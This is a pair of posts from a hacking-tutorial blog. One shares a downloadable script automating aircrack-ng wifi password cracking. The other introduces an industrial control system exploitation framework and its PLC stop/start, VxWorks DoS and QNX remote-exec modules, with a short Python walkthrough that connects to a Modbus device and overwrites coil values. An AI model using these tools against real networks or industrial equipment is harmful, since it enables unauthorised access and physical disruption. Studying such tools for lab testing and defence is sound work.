Thursday, 22 March 2018

Aircrack-ng Automated | Bash Script


                                                                                           image source: www.aircrack-ng.org
Hi,
Got tired of typing commands for cracking wifi Passwords in the terminal? Here I made a solution for that. I was trying to reduce the time and effort made in typing commands for using aircrack-ng suite.
So I made a bash script for automation of aircrack-ng, which i am going to share with you. And you can make any type of changes in the script as you like. Although the script is working fine.

  1. You just have to download the script.
  2. Make that executable.
  3. Run the script with root privilege.

And just go with the flow.
Remember that, You can always ask for the wifi password or pay for that to owner.

https://drive.google.com/open?id=13DGfJVISL-5tw_XgjPSexqRJE4TflZ5s

As I said the script can be modified as required. Let me know if you need help.

Thank You.

Thursday, 15 March 2018

Industrial Control System Exploitation Framework




Introduction

ISF(Industrial Exploitation Framework) : It is a exploitation framework written in python and based on open source project routersploit. It helps us to test vulnerabilities with multiple programmable logic controller (PLC) and Industrial Control System (ICS) software.
Link :- https://github.com/dark-lbp/isf

Modbus : Modbus is a serial communication protocol. Which is used to connecting industrial electronic devices because they are free and easy to deploy. It has one Master and one (at least) or more Slaves. Each slave has unique 8-bit device address or unit number.
Coils and registers are names or pre-defined variables for memory addresses. The coil is a boolean (bit) variable and a register is an integer variable. There are discrete inputs (read-only boolean), coils (read-write boolean), input registers (read-only integer), and holding registers (read-write integer).

Requirements

* gnureadline
* requests
* paramiko
* beautifulsoup4
* pysnmp
* python-nmap
* scapy

Exploit modules included in ICSSPLOIT

* s7_300_400_plc_control.py: Siemens S7-300 and S7-400 start/stop
* vxworks_rpc_dos.py: Works on all Vxworks system which Remote Procedure
    call (RPC) protocols is enabled.CVE-2015-7599)
* quantum_140_plc_control.py: Schneider Quantum 140 series start/stop.
* crash_qnx_inetd_tcp_service.py: Crash QNX Inetd tcp service started with inetd.
* qconn_remote_exec.py: QCONN QNX Neutrino remote command execution
    vulnerability.

Installation

There is requirements file which can be installed by using pip as:
pip install -r requirements


PoC

--> Setup Modbus master and one slave on other machine in network.

--> Import module
Move to downloaded directory isf and type python
 
from icssploit.clients.modbus_tcp_client import ModbusClient

 

--> Init Client

target = ModbusClient(name=’modbus_tcp_client’, ip=’<IP>’)
 
eg: target = ModbusClient(name=’modbus_tcp_client’, ip=’192.168.0.115’)
target.connect()

We are now connected to Modbus Client.

 
--> Read Coils
 
target.read_coils(address=<Address Of Slave>, count=<Count Of Coils>)
 
eg: target.read_coils(address=100, count=10)
 
This is used to read the values of coil at specified slave address.



--> Write Coils



 
target.write_multiple_coils(address=<Address Of Slave>, values=[<Values To
Be Written>])
 
eg: target.write_multiple_coils(address=100, values=[1, 1, 1, 1, 1, 1, 1, 1])
 
We can also change or write the values of coils here.




Now we can read coils again to confirm the changes made.







Featured Post

Exploiting Windows using malicious VCF file

John Page a cyber security researcher brought this vulnerability, which was a 0 day exploit working on latest windows 10 too. Introductio...